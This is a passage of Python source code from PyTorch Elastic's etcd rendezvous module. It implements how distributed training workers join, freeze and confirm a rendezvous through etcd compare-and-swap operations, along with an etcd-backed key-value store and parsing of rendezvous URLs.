# Similar to retryable failure, but the new state we observed suggests we
# can re-try immediately, i.e. without a need for "safety delay".
class EtcdRendezvousRetryImmediately(Exception):
pass
# Default overall timeout for rendezvous barrier.
CONST_DEFAULT_OVERALL_TIMEOUT = 600
# Additional waiting amount after reaching num_min_workers,
# for the case rendezvous is elastic (min != max):
CONST_DEFAULT_LAST_CALL_TIMEOUT = 30
# Various constants used internally in EtcdRendezvous
CONST_ETCD_SETUP_TTL = 5
CONST_ETCD_FROZEN_TTL = 10
CONST_ETCD_JOINABLE_EPHEMERAL_TTL = 10
# Ephemeral node TTL for worker's keep-alive key:
CONST_WORKER_KEEPALIVE_TTL = 10
# TTL for the ephemeral run_id-specific directory. All rendezvous state data
# for a specific run_id (job instance) is contained within directory.
# Its only role is to clean-up rendezvous data from old runs (for the case when
# etcd server is persistent), and has no affect on correctnes, but should be
# larger than any timeouts that a worker process is expected to survive:
CONST_RUNID_SUBROOT_TTL = 7200 # 2 hours
# Delay (sleep) for a small random amount to reduce CAS failures.
# This does not affect correctness, but will reduce requests to etcd server.
def cas_delay():
time.sleep(random.uniform(0, 0.1))
class EtcdRendezvousHandler(RendezvousHandler):
"""
Implements a :py:class:`torchelastic.rendezvous.RendezvousHandler`
interface backed by
:py:class:`torchelastic.rendezvous.etcd_rendezvous.EtcdRendezvous`.
Torchelastic uses a URL to configure the type of rendezvous to use and
to pass implementation specific configurations to the rendezvous module.
The basic etcd rendezvous configuration URL looks like the following
::
etcd://<etcd_address>:<port>/<job_id>?min_workers=<min_workers>&max_workers=<max_workers> # noqa W605
-- example --
etcd://localhost:2379/1234?min_workers=1&max_workers=3
The URL above is interpreted as follows:
1. Use the rendezvous handler that is registered with the ``etcd``
scheme
2. The ``etcd`` endpoint to use is ``localhost:2379``
3. ``job_id == 1234`` is used as the prefix in etcd (this allows one to
share a common etcd server for multiple jobs so long as the
``job_ids`` are guaranteed to be unique). Note that the job id can be
any string (e.g. does not need to be a number) as long as it is
unique.
4. ``min_workers=1`` and ``max_workers=3`` specifies a range for
membership size - torchelastic starts running the job as long as the
cluster size is greater than or equal to ``min_workers`` and admits
up to ``max_workers`` into the cluster.
Below are a full list of the parameters that can be passed to etcd
rendezvous:
+--------------------------------------------+--------------------------+
| Parameter | Description |
+============================================+==========================+
| min_workers | minimum number of |
| | workers for the |
| | rendezvous to be valid |
+--------------------------------------------+--------------------------+
| max_workers | maximum number of |
| | workers to admit |
+--------------------------------------------+--------------------------+
| timeout | total timeout within |
| | which next_rendezvous is |
| | expected to succeed |
| | (default 600s) |
+--------------------------------------------+--------------------------+
| last_call_timeout | additional wait amount |
| | (“last call”) after min |
| | number of workers has |
| | been reached (defaults |
| | to 30s) |
+--------------------------------------------+--------------------------+
| etcd_prefix | path prefix (from etcd |
| | root), inside which all |
| | etcd nodes will be |
| | created (defaults to |
| | ``/torchelastic/p2p``) |
+--------------------------------------------+--------------------------+
"""
def __init__(self, rdzv_impl):
self._rdzv_impl = rdzv_impl
def __del__(self):
# TODO: look into using weakref here instead.
del self._rdzv_impl
def next_rendezvous(self):
rdzv_version, rank, world_size = self._rdzv_impl.rendezvous_barrier()
log.info("Creating EtcdStore as the c10d::Store implementation")
store = self._rdzv_impl.setup_kv_store(rdzv_version)
return store, rank, world_size
def is_closed(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
return state["status"] == "closed"
except etcd.EtcdKeyNotFound:
# No rendezvous state, so it cannot be closed.
return False
def set_closed(self):
self._rdzv_impl.set_closed()
def num_nodes_waiting(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
if state["status"] == "final":
return state["num_workers_waiting"]
except etcd.EtcdKeyNotFound:
pass
return 0
# TODO: we should probably handle a few additional errors,
# like EtcdLeaderElectionInProgress and EtcdWatcherCleared. These are
# only relevant for multi-node Etcd ensemble. A simple retry would work,
# but is verbose to add everywhere. Consider wrapping the client calls
# into auto-retry for these errors?
#
class EtcdRendezvous(object):
"""
A rendezvous implementation that uses `etcd <https://etcd.io/>`__ as
the backend store.
"""
def __init__(
self,
endpoints,
prefix,
run_id,
num_min_workers,
num_max_workers,
timeout,
last_call_timeout,
**kwargs,
):
self._prefix = prefix
self._run_id = run_id
self._num_min_workers = num_min_workers
self._num_max_workers = num_max_workers
self._timeout = timeout
self._last_call_timeout = last_call_timeout
# For cleaning up TTL refresher threads (for ephemeral keys)
self._lease_run_id_stop = None
self._lease_this_rank_stop = None
if not self._prefix.endswith("/"):
self._prefix += "/"
self.client = etcd.Client(host=endpoints, allow_reconnect=True, **kwargs)
log.info("Etcd machines: " + str(self.client.machines))
# Setup a permanent prefix dir, if didn't exist
if self._prefix != "/":
self.create_path_if_not_exists(self._prefix)
# Lease a "sub-root" node specific to this job instance (run_id)
self.create_path_if_not_exists(self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL)
self._lease_run_id_stop = self.setup_lease_renewal(
self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL
)
# Subdir for all rendezvous work
self.create_path_if_not_exists(self.get_path("/rdzv"))
# Create a rendezvous version counter, if doesn't exist
try:
self.client.write(
key=self.get_path("/rdzv/version_counter"), value="0", prevExist=False
)
except etcd.EtcdAlreadyExist:
pass
def __del__(self):
# TODO: look into using weakref here instead.
if self._lease_run_id_stop is not None:
self._lease_run_id_stop.set()
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
def rendezvous_barrier(self):
"""
Main entry point for next rendezvous.
This method is blocking until rendezvous succeeds or a timeout occurs.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousTimeoutException - timeout waiting for rendezvous
RendezvousNonRetryableError - other persistent errors that
render the rendezvous non-retryable
RendezvousClosedException - rendezvous is or was closed while
waiting
"""
self._rendezvous_deadline = time.time() + self._timeout
while True:
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
log.info("Attempting to join next rendezvous")
try:
# Dis-own our lease in the previous rendezvous, if exists
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
return self.init_phase()
except EtcdRendezvousRetryImmediately:
# The type of failure suggests we can retry without delay
pass
except EtcdRendezvousRetryableFailure:
# In case of retryable failure, wait a small delay
# to avoid spamming etcd
time.sleep(1)
except RendezvousTimeoutException:
log.info("Rendezvous timeout occured in EtcdRendezvousHandler")
raise
except RendezvousClosedException:
log.info(
f"Rendezvous for run_id={self._run_id} was observed to be closed"
)
raise
except RendezvousNonRetryableError:
raise
except Exception as e:
# In case of a general exception, wait a small delay
# to avoid spamming etcd
# FIXME: there are a few things that fall under this like
# etcd.EtcdKeyNotFound, etc, which could be handled more explicitly.
log.info("Rendezvous attempt failed, will retry. Reason: " + str(e))
time.sleep(1)
def init_phase(self):
"""
Initially, the rendezvous state is expected to be one of:
1. empty (non-existent) - in this case we try to create a new one.
2. joinable - we try to join it.
3. final - we announce ourselves as waiting, and go into monitoring mode
Any other state is considered transitional, and will be retried after
a short delay.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousClosedException - current rendezvous was/is closed
EtcdRendezvousRetryableFailure - observed some intermediate
state, which is best handled by retrying later
"""
try:
active_version = self.try_create_rendezvous()
state = json.loads(active_version.value)
log.info("New rendezvous state created: " + str(state))
except etcd.EtcdAlreadyExist:
active_version, state = self.get_rdzv_state()
# Note: it is possible for above query to fail (etcd.EtcdKeyNotFound),
# but this is ok for us - just means we'll restart from beginning.
log.info("Observed existing rendezvous state: " + str(state))
if state["status"] == "closed":
raise RendezvousClosedException()
if state["status"] == "joinable":
return self.join_phase(state["version"])
if state["status"] == "final":
self.handle_existing_rendezvous(state["version"])
raise EtcdRendezvousRetryImmediately()
self.try_wait_for_state_change(etcd_index=active_version.etcd_index + 1)
raise EtcdRendezvousRetryableFailure()
def join_phase(self, expected_version):
"""
We observed a rendezvous state in 'joinable' state, and attempt to join this
particular version, and then wait for all other peers to join.
"""
# Failure to join will propagate an exception, causing a re-entry.
active_version, this_rank = self.join_rendezvous(expected_version)
state = json.loads(active_version.value)
log.info(
"Joined rendezvous version {} as rank {}. Full state: {}".format(
state["version"], this_rank, state
)
)
# If this worker was first to reach num_min_workers requirement,
# and rendezvous is still joinable (therefore it is elastic),
# then this worker will be repsonsible for waiting out the "last call"
# timeout and closing (i.e. transitioning to 'frozen') the rendezvous
# afterwards.
# As a safety against a potential failure of this worker (during the
# last call timeout), the rendezvous state is made ephemeral
# when min_num_workers is reached.
if this_rank == self._num_min_workers - 1 and state["status"] == "joinable":
log.info("Rank {} is responsible for join last call.".format(this_rank))
last_call_deadline = time.time() + self._last_call_timeout
self.handle_join_last_call(expected_version, last_call_deadline)
log.info("Rank {} finished join last call.".format(this_rank))
# Wait for rendezvous state to be frozen, which means a fixed set of peers
log.info("Waiting for remaining peers.")
active_version = self.wait_for_peers(expected_version)
state = json.loads(active_version.value)
assert (
state["version"] == expected_version
), "Logic error: failed to observe version mismatch"
return self.confirm_phase(expected_version, this_rank)
def confirm_phase(self, expected_version, this_rank):
"""
Once the rendezvous state trainsitions from 'joinable' to 'frozen',
we have every participant confirm their membership and setup per-member
keep-alive TTL keys, and then wait for all other participants to confirm,
which would then successfully conclude this rendezvous.
"""
log.info("All peers arrived. Confirming membership.")
self.confirm_membership(expected_version, this_rank)
log.info("Waiting for confirmations from all peers.")
active_version = self.wait_for_final(expected_version)
state = json.loads(active_version.value)
log.info(
"Rendezvous version {} is complete. Final state: {}".format(
state["version"], state
)
)
# Rendezvous version number; our rank in it; world size
return state["version"], this_rank, len(state["participants"])
def handle_existing_rendezvous(self, expected_version):
"""
Handle the case when there's an existing (state 'final) rendezvous already
in place, and we have to announce ourselves waiting, and wait until
the next rendezvous opportunity.
"""
# If state is 'final' -> increment num_workers_waiting
# Then, observe state changes:
# 1. if it's no longer final -> bail out and re-try
# 2. if keep alives are missing, destroy it and bail out.
active_state = self.announce_self_waiting(expected_version)
log.info(
"Added self to waiting list. Rendezvous full state: {}".format(
active_state.value
)
)
self.wait_for_rendezvous_to_free(expected_version)
log.info("Previously existing rendezvous state changed. Will re-try joining.")
def try_create_rendezvous(self):
"""
Create new rendezvous state or raise an exception that indicates
an unexpected state (e.g. already exists)
Raises:
RendezvousNonRetryableError - on unexpected state
"""
# Initially active_version is ephemeral - this is to handle the
# possibility that might fail to complete the setup transaction,
# i.e. the transition "setup" -> "joinable".
active_version = self.client.write(
key=self.get_path("/rdzv/active_version"),
value=json.dumps({"status": "setup"}),
prevExist=False,
ttl=CONST_ETCD_SETUP_TTL,
)
try:
version_counter = self.client.get(self.get_path("/rdzv/version_counter"))
version_counter.value = str(int(version_counter.value) + 1)
self.client.update(version_counter)
except (etcd.EtcdKeyNotFound, etcd.EtcdCompareFailed):
raise RendezvousNonRetryableError(
"Unexpected state of EtcdRendezvousHandler, worker needs to die."
)
# Any failure below results in declaring a retryable rendezvous failure.
# The ephemeral /rdzv/active_version will expire and someone can then
# re-try the setup process.
# Create directory node for participant data
self.client.write(
key=self.get_path("/rdzv/v_{}".format(version_counter.value)),
value=None,
dir=True,
prevExist=False,
)
# Publish rendezvous version and signal it is ready-to-be-joined.
# If rendezvous was set closed just before this, a retry will happen,
# where the closed condition will be handled.
return self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(
{
"status": "joinable",
"version": version_counter.value,
"participants": [],
}
),
prev_value=active_version.value,
)
def join_rendezvous(self, expected_version):
"""
Helper method for the join phase.
"""
# Use compare-and-swap to add self to rendezvous state:
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "joinable":
raise EtcdRendezvousRetryableFailure(
"Rendezvous state became non-joinable before we could join. "
"Must join next one."
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
assert (
len(state["participants"]) < self._num_max_workers
), "Logic error: joinable rendezvous should always have space left"
this_rank = len(state["participants"])
state["participants"].append(this_rank)
# When reaching min workers, or changing state to frozen, we'll set
# the active_version node to be ephemeral.
if len(state["participants"]) == self._num_max_workers:
state["status"] = "frozen"
state["keep_alives"] = []
set_ttl = CONST_ETCD_FROZEN_TTL
elif len(state["participants"]) >= self._num_min_workers:
set_ttl = CONST_ETCD_JOINABLE_EPHEMERAL_TTL
else:
set_ttl = None
try:
# Compare-and-swap.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=set_ttl,
)
# We succeeded joining.
return active_version, this_rank
except etcd.EtcdCompareFailed:
log.info("Join rendezvous CAS unsuccessful, retrying")
def wait_for_peers(self, expected_version):
"""
Helper method for the join phase.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Success, all peers arrived.
return active_version
elif state["status"] == "joinable" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def confirm_membership(self, expected_version, this_rank):
"""
Helper method for the confirm phase
"""
# Compare-and-swap loop
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "frozen":
raise EtcdRendezvousRetryImmediately(
"Rendezvous no longer frozen, before we confirmed. "
"Must join next one"
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
this_lease_key = self.get_path(
"/rdzv/v_{}/rank_{}".format(expected_version, this_rank)
)
self.client.set(this_lease_key, value=None, ttl=CONST_WORKER_KEEPALIVE_TTL)
state["keep_alives"].append(this_lease_key)
if len(state["keep_alives"]) == len(state["participants"]):
# Everyone confirmed (this rank is last to do so)
state["status"] = "final"
state["num_workers_waiting"] = 0
finalize = True
else:
finalize = False
try:
# Compare-and-swap. If new state is still frozen, keep it ephemeral.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=None if finalize else CONST_ETCD_FROZEN_TTL,
)
self._lease_this_rank_stop = self.setup_lease_renewal(
this_lease_key, ttl=CONST_WORKER_KEEPALIVE_TTL
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Confirm membership CAS unsuccessful, retrying")
def wait_for_final(self, expected_version):
"""
Helper method for the confirm phase
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "final" and state["version"] == expected_version:
# Succcess. This rendezvous is final, and we accept it.
return active_version
elif state["status"] == "frozen" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def announce_self_waiting(self, expected_version):
"""
Announce this worker is waiting (via num_workers_waiting counter) to join next
rendezvous, but only if state and version match.
"""
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "final" or state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately()
# Increment counter to signal an additional waiting worker.
state["num_workers_waiting"] += 1
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Announce self as waiting CAS unsuccessful, retrying")
def wait_for_rendezvous_to_free(self, expected_version):
"""
When there's an existing valid rendezvous in state 'final', we have to
wait until the next opportunity to join.
Such opportunity may come from:
1. rendezvous state changed by someone else, in which case we unblock and retry.
2. rendezvous becomes invalid because at least one member failed to renew their
leased keep_alive node. We detect this, and destroy the rendezvous.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] != "final" or state["version"] != expected_version:
return
# Check if current rendezvous state is valid, in the sense that all
# its members are alive (renewing their lease).
# If not, try destroy this rendezvous, so a new one can be created.
alive_members = self.client.get(
self.get_path("/rdzv/v_{version}".format(version=expected_version))
)
keep_alive_keys = [ch.key for ch in alive_members.children]
for key in state["keep_alives"]:
if key not in keep_alive_keys:
# This participant didn't renew their lease. We'll declare this
# rendezvous version as dead (but only if it hadn't changed)
log.info("Keep-alive key {} is not renewed.".format(key))
log.info(
"Rendevous version {} is incomplete. ".format(expected_version)
)
log.info("Attempting to destroy it.")
# Compare-and-delete operation. Throws if compare failed,
# which means rendezvous was already destroyed/re-created/closed,
# and we can try to re-enter the barrier.
self.client.delete(
key=self.get_path("/rdzv/active_version"),
prevValue=active_version.value,
)
log.info(
"Destroyed rendezvous version {} successfully.".format(
expected_version
)
)
# We can return (and retry) immediately
return
# Existing rendezvous seems valid, no reason to destroy it.
# We just have to wait until something changes and re-check.
try:
overall_timeout = (
max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
)
self.client.watch(
key=self.get_path("/rdzv"),
index=active_version.etcd_index + 1,
recursive=True,
timeout=overall_timeout,
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
active_version, state = self.get_rdzv_state()
def handle_join_last_call(self, expected_version, deadline):
"""
After we reach min number of workers, one particular worker takes on the
responsibility of waiting an additional timeout before closing the join window.
If the worker responsible for this fails, the rendezvous will be destroyed due
to expiring TTL, and the other participants will re-rendezvous.
Here we expect to see state <joinable, expected_version>
Exit gracefully if either:
1. state becomes <frozen, expected_version>
2. timeout happens (reaching deadline), in which case
we try the tranisiton to <frozen, expected_version>
Exit with exception otherwise.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Worker set became frozen before last-call timeout. This is possible
# when num_max_workers is reached before the tiemout.
return
if state["status"] != "joinable" or state["version"] != expected_version:
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
# If timeout occurred, attempt a state transition (joinable -> frozen)
if time.time() >= deadline:
state["status"] = "frozen"
state["keep_alives"] = []
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=CONST_ETCD_FROZEN_TTL,
)
# We successfully made this rendezvous frozen.
return
except etcd.EtcdCompareFailed:
log.info("Join last-call transition CAS unsuccessful. Will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
continue
# Timeout did not occur, so we must refresh TTL, and wait for
# further changes. Note: we only want TTL to be refreshed if
# state is still joinable, hence we use CAS for that here,
# even though we don't change any of the data.
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=active_version.value,
prev_value=active_version.value,
ttl=CONST_ETCD_JOINABLE_EPHEMERAL_TTL,
)
# Minimize "oversleeping":
timeout = min(
CONST_ETCD_JOINABLE_EPHEMERAL_TTL / 2,
deadline - time.time() + 1.0, # Oversleeping by 1s is ok.
)
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1, timeout=timeout
)
except etcd.EtcdCompareFailed:
log.info("Join last-call TTL refresh CAS unsuccessful, will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
def set_closed(self):
"""
Mark rendezvous 'closed' for current run_id, which is used to signal other
participants to not attempt to perform (re-)rendezvous. This is useful
when one of the workers decides the job is complete.
"""
while True:
active_version, state = self.get_rdzv_state()
if state["status"] == "closed":
# Already closed by someone else.
return
state["status"] = "closed"
try:
self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Set closed CAS unsuccessful, retrying")
cas_delay()
def get_rdzv_state(self):
active_version = self.client.get(key=self.get_path("/rdzv/active_version"))
return active_version, json.loads(active_version.value)
def try_wait_for_state_change(self, etcd_index, timeout=None):
# Don't sleep past the overall deadline (at least more than by 1s)
overall_timeout = max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
timeout = overall_timeout if timeout is None else min(timeout, overall_timeout)
try:
self.client.watch(
self.get_path("/rdzv/active_version"), index=etcd_index, timeout=timeout
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
# Unfortunately, we have to do another fetch in order to get last etcd_index.
return self.get_rdzv_state()
def get_path(self, path):
if not path.startswith("/"):
path = "/" + path
return "{prefix}run_{run_id}{path}".format(
prefix=self._prefix, run_id=self._run_id, path=path
)
def create_path_if_not_exists(self, full_path, ttl=None):
try:
self.client.write(
key=full_path, value=None, dir=True, prevExist=False, ttl=ttl
)
except etcd.EtcdAlreadyExist:
pass
def setup_lease_renewal(self, full_path, ttl):
# NOTE: For ephemeral key TTL renewal (~lease) to work correctly,
# make sure you don't call any long-blocking methods that do not
# release the Python's GIL! An example of this is calling a pybind11
# extension function that is blocking / long-running, but is not
# doing a scoped release of the GIL.
def lease_worker(client, path, ttl, stop_event):
while True:
try:
client.refresh(path, ttl=ttl)
except etcd.EtcdKeyNotFound:
break
if stop_event.wait(timeout=ttl / 2):
break
lease_stop_event = threading.Event()
lease_thread = threading.Thread(
target=lease_worker, args=(self.client, full_path, ttl, lease_stop_event)
)
lease_thread.daemon = True
lease_thread.start()
return lease_stop_event
def store_extra_data(self, rdzv_version, key, value):
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
try:
# If first time we are storing anything:
extra_data = self.client.write(
key=node, value=json.dumps({key: value}), prevExist=False
)
return
except etcd.EtcdAlreadyExist:
pass
# CAS loop, to make sure we don't lose concurrent stores.
while True:
# We never delete extra_data. Failure here should be fatal, no special handling.
extra_data = self.client.get(node)
new_extra_data_value = json.loads(extra_data.value)
new_extra_data_value[key] = value
try:
extra_data = self.client.test_and_set(
key=node,
value=json.dumps(new_extra_data_value),
prev_value=extra_data.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Store extra_data CAS unsuccessful, retrying")
time.sleep(0.1)
def load_extra_data(self, rdzv_version, key, timeout=None):
# 'extra_data' node itself, and the directory it is located in:
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
node_dir = self.get_path("/rdzv/v_{}".format(rdzv_version))
# TODO: implement timeout
# https://github.com/pytorch/elastic/issues/12
while True:
# Combined wait for the node itself, and the key inside it.
root = self.client.get(node_dir)
# Find the extra_data node, if it exists
extra_data = [n for n in root.children if n.key == node]
assert len(extra_data) <= 1
# Node for extra_data exists, check the desired key inside it.
if len(extra_data) == 1:
extra_data_dict = json.loads(extra_data[0].value)
if key in extra_data_dict:
return extra_data_dict[key]
# The 'extra_data' node doesn't exist, or they key isn't published yet.
# Wait for interesting events on the extra_data node and retry.
try:
self.client.watch(node, index=root.etcd_index + 1)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
def setup_kv_store(self, rdzv_version):
store_path = self.get_path(f"/rdzv/v_{rdzv_version}/kv")
self.create_path_if_not_exists(store_path)
return EtcdStore(etcd_client=self.client, etcd_store_prefix=store_path)
# pyre-fixme[11]: Annotation `Store` is not defined as a type.
class EtcdStore(Store):
"""
Implements a c10 Store interface by piggybacking on the rendezvous etcd
instance. This is the store object returned by ``EtcdRendezvous``
"""
def __init__(
self,
etcd_client,
etcd_store_prefix,
timeout: Optional[datetime.timedelta] = None,
):
super().__init__() # required for pybind trampoline.
self.client = etcd_client
self.prefix = etcd_store_prefix
# Default timeout same as in c10d/Store.hpp
self.timeout = (
timeout if timeout is not None else datetime.timedelta(seconds=300)
)
if not self.prefix.endswith("/"):
self.prefix += "/"
def set(self, key, value):
"""
Write a key/value pair into ``EtcdStore``.
Both key and value may be either Python ``str`` or ``bytes``.
"""
self.client.set(key=self.prefix + self._encode(key), value=self._encode(value))
def get(self, key) -> bytes:
"""
Get a value by key, possibly doing a blocking wait.
If key is not immediately present, will do a blocking wait
for at most ``timeout`` duration or until the key is published.
Returns:
value ``(bytes)``
Raises:
LookupError - If key still not published after timeout
"""
b64_key = self.prefix + self._encode(key)
kvs = self._try_wait_get([b64_key])
if kvs is None:
raise LookupError(f"Key {key} not found in EtcdStore")
return self._decode(kvs[b64_key])
def add(self, key, num: int) -> int:
"""
Atomically increment a value by an integer amount. The integer is
represented as a string using base 10. If key is not present,
a default value of ``0`` will be assumed.
Returns:
the new (incremented) value
"""
b64_key = self._encode(key)
# c10d Store assumes value is an integer represented as a decimal string
try:
# Assume default value "0", if this key didn't yet:
node = self.client.write(
key=self.prefix + b64_key,
value=self._encode(str(num)), # i.e. 0 + num
prevExist=False,
)
return int(self._decode(node.value))
except etcd.EtcdAlreadyExist:
pass
while True:
# Note: c10d Store does not have a method to delete keys, so we
# can be sure it's still there.
node = self.client.get(key=self.prefix + b64_key)
new_value = self._encode(str(int(self._decode(node.value)) + num))
try:
node = self.client.test_and_set(
key=node.key, value=new_value, prev_value=node.value
)
return int(self._decode(node.value))
except etcd.EtcdCompareFailed:
cas_delay()
def wait(self, keys, override_timeout: Optional[datetime.timedelta] = None):
"""
Waits until all of the keys are published, or until timeout.
Raises:
LookupError - if timeout occurs
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(b64_keys, override_timeout)
if kvs is None:
raise LookupError("Timeout while waiting for keys in EtcdStore")
# No return value on success
def check(self, keys) -> bool:
"""
Check if all of the keys are immediately present (without waiting).
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(
b64_keys,
override_timeout=datetime.timedelta(microseconds=1), # as if no wait
)
return kvs is not None
def set_timeout(self, timeout: datetime.timedelta):
"""
Change the timeout used for all future operations.
"""
self.timeout = timeout
#
# Encode key/value data in base64, so we can store arbitrary binary data
# in EtcdStore. Input can be `str` or `bytes`.
# In case of `str`, utf-8 encoding is assumed.
#
def _encode(self, value) -> str:
if type(value) == bytes:
return b64encode(value).decode()
elif type(value) == str:
return b64encode(value.encode()).decode()
raise ValueError("Value must be of type str or bytes")
#
# Decode a base64 string (of type `str` or `bytes`).
# Return type is `bytes`, which is more convenient with the Store interface.
#
def _decode(self, value) -> bytes:
if type(value) == bytes:
return b64decode(value)
elif type(value) == str:
return b64decode(value.encode())
raise ValueError("Value must be of type str or bytes")
#
# Get all of the (base64-encoded) etcd keys at once, or wait until all the keys
# are published or timeout occurs.
# This is a helper method for the public interface methods.
#
# On success, a dictionary of {etcd key -> etcd value} is returned.
# On timeout, None is returned.
#
def _try_wait_get(self, b64_keys, override_timeout=None):
timeout = self.timeout if override_timeout is None else override_timeout
deadline = time.time() + timeout.total_seconds()
while True:
# Read whole directory (of keys), filter only the ones waited for
all_nodes = self.client.get(key=self.prefix)
req_nodes = {
node.key: node.value
for node in all_nodes.children
if node.key in b64_keys
}
if len(req_nodes) == len(b64_keys):
# All keys are available
return req_nodes
watch_timeout = deadline - time.time()
if watch_timeout <= 0:
return None
try:
self.client.watch(
key=self.prefix,
recursive=True,
timeout=watch_timeout,
index=all_nodes.etcd_index + 1,
)
except etcd.EtcdWatchTimedOut:
if time.time() >= deadline:
return None
else:
continue
except etcd.EtcdEventIndexCleared:
continue
def _get_socket_with_port():
import socket
addrs = socket.getaddrinfo(
host="localhost", port=None, family=socket.AF_UNSPEC, type=socket.SOCK_STREAM
)
for addr in addrs:
family, type, proto, _, _ = addr
try:
s = socket.socket(family, type, proto)
s.bind(("localhost", 0))
s.listen(0)
return s
except OSError as e:
s.close()
log.info("Socket creation attempt failed: " + e)
raise RuntimeError("Failed to create a socket")
# Helper for _etcd_rendezvous_handler(url)
def _parse_etcd_client_params(params):
kwargs = {}
if "protocol" in params:
protocol = params["protocol"]
assert protocol in ["http", "https"], "Protocol must be http or https."
kwargs["protocol"] = protocol
if "cacert" in params:
kwargs["ca_cert"] = params["cacert"]
if "cert" in params:
if "key" in params:
# python-etcd client expects key as a second element of `cert` tuple
kwargs["cert"] = (params["cert"], params["key"])
else:
kwargs["cert"] = params["cert"]
return kwargs
# Handler for torch.distributed "static" registration
def _etcd_rendezvous_handler(url):
"""
Example URLs:
etcd://localhost:2379/123?min_workers=4&max_workers=8&timeout=300
etcd://192.168.0.42/123?etcd_prefix=/custom_prefix/foo&min_workers=4
etcd://localhost:2379/123?min_workers=4&protocol=https&cacert=/etc/kubernetes/certs/ca.crt&cert=/etc/kubernetes/certs/client.crt&key=/etc/kubernetes/certs/client.key
Where:
123 - the run_id (unique id for this training job instance),
min_workers=4 - min number of workers expected to join the rendezvous,
max_workers=8 - max number of workers allowed to join the rendezvous,
defaults to min_workers is not specified.
timeout=300 - total timeout within which next_rendezvous is expected to
succeed; a RendezvousTimeoutException is raised otherwise;
Defaults is 600 (10 minutes).
last_call_timeout - additional wait amount ("last call") after
min number of workers has been reached.
Defaults to 30 seconds.
etcd_prefix - path prefix (from etcd root), inside which all
etcd nodes will be created.
Default is "/torchelastic/p2p".
protocol=https - http (default) or https to access etcd.
cacert=/etc/kubernetes/certs/ca.crt - CA cert to access etcd,
only makes sense with https.
cert=/etc/kubernetes/certs/client.crt - client cert to access etcd,
only makes sense with https.
key=/etc/kubernetes/certs/client.key - client key to access etcd,
only makes sense with https.
"""
import re
from urllib.parse import urlparse
url = urlparse(url)
assert url.scheme == "etcd"
# Etcd endpoints. (Current url format only allows a single host)
endpoint = url.netloc
match = re.match(r"(.+):(\d+)$", endpoint) # check if port was provided
if match:
etcd_endpoints = ((match.group(1), int(match.group(2))),)
else:
# Use default etcd port
etcd_endpoints = ((endpoint, 2379),)
# Run ID value -> unique identifier of this training job instance:
# typically a job_id or name assigned by the scheduler or user
run_id = url.path.strip("/")
# Parse all of query parameters:
params = dict(pair.split("=") for pair in filter(None, url.query.split("&")))
etcd_prefix = params.get("etcd_prefix", "/torchelastic/p2p")
num_min_workers = int(params["min_workers"])
num_max_workers = int(params.get("max_workers", num_min_workers))
assert num_min_workers >= 1, "Min number of workers should be at least 1"
assert (
num_max_workers >= num_min_workers
